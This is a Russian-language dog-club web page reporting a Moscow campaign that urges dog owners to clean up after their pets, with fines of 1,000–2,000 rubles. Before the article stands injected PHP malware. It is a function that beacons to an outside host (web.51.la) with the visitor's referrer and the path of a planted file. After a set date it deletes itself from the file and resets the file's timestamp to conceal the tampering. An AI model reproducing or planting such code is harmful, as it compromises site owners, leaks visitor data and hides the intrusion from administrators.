check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); } В Москве прошли рейды на безответственных владельцев собак
 

РКФ Новый век

Мы в ответе за тех, кого приручили.

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта
Home Интересные новости В Москве прошли рейды на безответственных владельцев собак

В Москве прошли рейды на безответственных владельцев собак

E-mail Печать PDF
>14 апреля в Москве состоялась акция с говорящим названием «Убери за своим питомцем», на ней собрались активисты молодёжной и экологической политики. Также участницей акции стала председатель комиссии Московской городской думы по экологической политике Зоя Зотова.

В ходе акции её участники раздали владельцам собак специальные пакеты — диспенсеры для экскрементов. Вместе с ними раздавали листовки с цитатами из законов, напоминающие о том, что москвичи обязаны убирать за собаками и не загрязнять общественные места, в том числе подъезды и детские площадки. Кроме того, эти листовки активисты развесили у подъездов жилых домов.

По словам Зои Зотовой, проблема безответственности хозяев собак сейчас особенно актуальна. «Мы побывали на Волжском бульваре. Там установлена новая собачья площадка со всевозможными тренажерами. Со своим питомцем на площадке можно отлично провести время. Но некоторые собачники всё равно предпочитают выгуливать питомцев в большом людном сквере неподалеку. При этом мало кто помнит, что за своей собакой следует убирать. Снег уже сошел, и масштабы "бедствий" особенно заметны», — рассказала она.

Чиновница также отметила, что это был только первый рейд, но точно не последний. Так, уже к следующему такому рейду планируется привлечь сотрудников полиции. В случаях выявления нарушений штрафы собаководам будут выписываться на месте. Сегодня в Москве штраф за неубранные собачьи экскременты составляет 1000 рублей. За повторное нарушение — 2000 рублей.


Источник http://daylapu.ru/news.php?ngod=2018&news=19
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск



Случайное изображение.

 2006  007.jpg

Реклама


Похожие материалы